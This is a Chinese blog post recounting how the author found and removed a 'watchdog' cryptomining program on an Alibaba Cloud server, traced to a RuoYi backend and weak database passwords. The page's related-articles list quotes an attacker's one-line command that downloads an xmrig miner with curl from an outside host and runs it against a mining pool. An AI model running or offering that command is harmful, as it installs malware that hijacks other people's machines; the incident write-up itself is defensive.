云服务器中挖矿病毒watchdog记录

最新推荐文章于 2024-07-02 12:14:14 发布
最新推荐文章于 2024-07-02 12:14:14 发布
阅读量2.2k 收藏 2
点赞数 4
分类专栏: 网络安全 文章标签: linux java 数据库 安全漏洞 云服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c_o_d_e_/article/details/114860314
版权

晚上收到阿里云服务器被攻击的紧急邮件,登录控制台就发现遭到了恶意植入挖矿病毒,直接把我cpu资源吃完了,可恨。

 

主要是挖矿程序和恶意脚本代码执行,我把这六个问题分别截图,挨个来解决

一、挖矿程序

看这两个挖矿程序的PID相同,直接追踪目标吧。应该是通过恶意植入了一个文件。先通过top查看了资源情况,好家伙,直接抓到凶犯。

 本想着直接kill -9杀掉该进程再说,但看了阿里云社区的相关案例,发现这种挖矿程序似乎还会出现,于是通过ls -l /proc/30282/exe找到了这个文件所在目录,似乎就是阿里云控制台提示的tmp目录,然后再按时间顺序打开目录(ls -lt -al),索性没有出现可疑文件,直接rm掉watchdog就行了。ok,至此解决掉这个恶意程序了。

 

 

二、访问恶意IP

看描述应该是基于上面那个watchdog挖矿文件来实现而已访问的,我想watchdog都已经删了,应该就不用管了。

三、访问恶意下载源

估计就是为了下载watchlog文件

 

四、恶意脚本执行

 这里通过进程链明显可以看到,是我ruoyi-admin.jar出了问题,攻击者就是通过它进行了后面一系列的攻击。这是我用来管理自己项目的一个开源后端框架,于是我跑到它的开源社区寻找相关issues,没想到还真有,哈哈。看了作者和一些开发者的交流,最终定位问题如下:

1数据库问题:可能是Redis、mysql弱密码导致。

2框架本身引用了一些带有漏洞的第三方依赖。

如果是框架本身的漏洞,我暂时也没空换其它框架,也没精力去寻找漏洞挨个修复,所以就先解决弱密码问题吧,看来密码真的不能随便设定啊,算是第一次被这种形式的攻击,涨个教训吧。

总结:其实现在从尾到头看,关键就在于我这个项目暴露了一个关键漏洞,让骇客抓住机会得以植入脚本,再通过脚本远程下载恶意挖矿病毒,最后病毒把cpu资源占满。

 

 

 

c_o_d_e_
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
linux服务器看门狗服务,服务器watchdog看门狗的理解
weixin_34614674的博客
05-03 3515
1.什么是watchdog?watchdog,文名称叫做“看门狗”,全称watchdogtimer,从字面上我们可以知道其实它属于一种定时器。然而它与我们平常所接触的定时器在作用上又有所不同。普通的定时器一般起记时作用,记时超时(TimerOut)则引起一个断,例如触发一个系统时钟断。熟悉windows开发的朋友应该用过windows的Timer,windowsTimer的作用与方才所...
记录一次watchdog挖矿
buzenmedi的专栏
06-29 643
突然发现机器cpu很高,一看cpu飙到60% 查了一下进程发现可疑的进程,给干掉了,cpu恢复正常 bash -c curl https://whatsmyipv4.cf/xmrig -o /tmp/watchdog && chmod +x /tmp/watchdog && nohup /tmp/watchdog --donate-level 1 -o sg.minexmr.com:443 -u 44BwEPy6EAHMgi7x2SXq1v3kdokMgKFvxf
如何更有效的消灭watchdogs挖矿病毒?华为云DCS Redis为您支招
weixin_34319999的博客
02-27 275
2019独角兽企业重金招聘Python工程师标准>>> ...
若依安装教程(保姆级教程)
最新发布
qq_73627657的博客
07-02 1655
若依(RuoYi)是一款基于 Spring Boot 和 Vue.js 的开源项目,旨在为开发人员提供一个快速、高效的企业级应用开发平台。若依框架集成了多种常用的功能模块,便于开发人员进行定制化开发。以下是若依的主要特点和功能简介。
watchdog 保证服务器的高可用性
qq_35964941的博客
04-18 1278
watchdog 是一款优秀的系统监控工具。普通情况下,它看似无关紧要,但却能在危机关头力挽狂澜。因为它能够在系统资源即将耗尽或即将崩溃时主动重启系统,避免由于硬件罢工而导致的被动重启或宕机造成的数据损失和业务损失。这里将讨论软件watchdog ,而不是硬件watchdog 。      watchdog 实际上是一个用于系统主动重启的计时器,默认倒计时为60秒,系统在60秒内往
Linux内核Watchdog
weixin_44376670的博客
10-09 4835
linux /dev/watchdog softlockup hardlockup 看门狗 kvm watchdog i6300esb
WatchDog在嵌入式应用的问题
07-23
看门狗定时器(WatchDog Timer)是一种在嵌入式系统广泛使用的技术,目的是为了提升系统稳定性和可靠性。其工作原理基于一个简单的定时器机制,如果定时器在预定时间内未被软件“喂狗”(即未重置定时器计数器),...
pythonwatchdog文件监控与检测上传功能
12-16
【PythonWatchdog文件监控与检测上传功能】 Python的文件监控功能主要依赖于第三方库,其最常用的有两个:pyinotify和watchdog。本篇主要介绍watchdog库,它是一个跨平台的文件系统事件监控库,能够有效地...
android Watchdog 实现剖析
09-05
在Android操作系统Watchdog是一种重要的系统监控机制,它主要负责检测系统服务是否正常运行,确保系统的稳定性和可靠性。本文将深入剖析Android Watchdog的实现原理及其工作流程。 首先,理解Watchdog的启动...
打包文件 watchdog
05-21
"打包文件 watchdog" 主要指的是在IT领域,一种用于监控系统或程序状态的机制,被称为"看门狗"(Watchdog)。看门狗是一种自动故障恢复机制,它通过定时检查程序或系统的运行状态来确保其正常运行。当程序异常或者...
单片机与DSP的什么是看门狗(watchdog
11-18
看门狗(Watchdog Timer,WDT)是嵌入式系统的一种重要安全机制,尤其在单片机(MCU)和数字信号处理器(DSP)广泛应用。它是一种硬件定时器,其主要任务是监测系统是否按照预期正常运行。当程序出现异常,如死...
CentOS 7安装实时监控日志文件的swatchdog
小楼一夜听春雨
08-01 1303
swatchdog介绍 重要的是,swatchdog是从一个用于监视Unix syslog工具生成的日志的脚本发展起来的,它可以监视任何类型的日志。swatchdog(Simple WATCH DOG)是一个简单的Perl脚本,用于监视类Unix系统(比如Linux)上的活动日志文件。它根据可以在配置文件定义的正则表达式监控日志。您可以从命令行或后台运行它,使用daemon模式选项在后台运行。 CentOS上面安装swatch sudo yum install epel-release &&a
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 3764
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
在阿里云里面服务器怎么样可以更好的链接数据库
m0_64068722的博客
11-26 640
环境:阿里云ubuntu服务器 阿里云RDS数据库 问题:如何在阿里云服务器的终端使用shell命令连接RDS云数据库 解决方法: 1.阿里云服务器安装MySQL sudo apt-get install mysql-server 如果出现unable to locate package mysql-server 先使用语句 sudo apt-get update 2.连接阿里云数据库 在阿里云服务器终端 mysql -u root -h RDS数据库连接地址 -p 按提示输入密..
100% 蓝屏解决方案:以 DPC_WATCHDOG_VIOLATION 为例
weixin_68987230的博客
07-22 2362
Windows 蓝屏的原因众多,你在网上搜到的解决方案,大多与你的情况不同,无法解决实际问题。但是,如果你找到并分析电脑上的 dmp 蓝屏日志,就会发现 Windows 已经给出了你的蓝屏原因。比如 DPC_WATCHDOG_VIOLATION 蓝屏,大多是由于硬件驱动出现问题造成的。你可以通过回退、更新或卸载驱动来修复蓝屏。接下来,我将具体介绍如何导出蓝屏日志、分析并解决蓝屏原因。
阿里云服务器被watchbog挖矿进程入侵
chuanlie4932的博客
03-01 260
1.查看所有进程 # top 或 ps aux |grep watchbog 看到watchbog进程占用了cpu的199%使用率,最后百度才知道是挖矿病毒。 2杀死进程 killall watchbog 3删除文件 //查看进程 #top //查看进程是否被杀死 //查找watchbo...
Linuxwatchdog/0是干什么的?底层原理是什么?
长风破浪会有时的博客
07-15 986
watchdog/0 线程是软件看门狗的一部分,负责定期发送信号以确认系统的正常运行。如果系统在预定的时间间隔内没有发送信号,那么看门狗设备会认为系统出现故障,触发相应的操作,例如系统重启或执行预定义的处理流程。watchdog/0 是 Linux 内核的一个线程,负责监控系统的健康状态并在发生故障时采取相应的措施。它是 Linux 内核的软件看门狗(Software Watchdog),旨在确保系统的可靠性和稳定性。通过软件看门狗的机制,系统能够自动监测并处理故障,提高系统的可用性和鲁棒性。
阿里云被恶意挖矿的处理方法
qq_55809729的博客
10-03 960
亲测:阿里云被恶意挖矿的处理方法
linuxwatchdog代码分析,使用 watchdog 构建高可用性的 Linux 系统及应用
weixin_42549723的博客
05-12 849
周 婷 (moting9@gmail.com), 软件工程师, IBM 国系统技术实验室周婷,软件工程师,目前在 IBM 国系统技术实验室从事服务器管理固件的开发工作简介: Linux 在不同领域如电信、终端便携设备等得到广泛应用,不同领域的应用对 Linux系统也提出相应的需求。Carrier Grade Linux 是 OSDL(Open Source Development Lab)发布...
autosarwatchdog test如何测试
10-22
在AUTOSARWatchdog是一种用于监视系统操作的硬件或软件机制。它能够检测系统的故障或死锁,并采取适当的措施,例如重启系统或发出警报。 在测试Watchdog功能时,可以采取以下步骤: 1. 首先,确保目标硬件上已经正确配置了Watchdog的定时器和相关设置。这包括Watchdog的喂狗周期和超时时间等。 2. 编写测试代码,用于启动Watchdog并设置定时器的喂狗周期。 3. 在测试代码,模拟系统的故障或死锁状态。例如,可以通过在关键任务引入无限循环或延时等方式来模拟系统死锁。 4. 在设置Watchdog的喂狗周期之后,在一定时间内不喂狗,以达到Watchdog超时的目的。 5. 确认系统是否执行了Watchdog超时动作,例如重启系统或发出警报。 6. 对系统进行故障恢复测试,确保在Watchdog超时后,系统能够成功恢复并继续正常运行。 7. 验证Watchdog在正常情况下是否能够防止系统故障或死锁的发生。 8. 对Watchdog进行边界测试,验证其在不同定时器设置下的性能和表现。 通过以上步骤,可以对AUTOSARWatchdog功能进行测试。测试的目的是验证Watchdog是否能够在系统故障或死锁发生时正常工作,并确保系统能够成功恢复和继续运行。
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值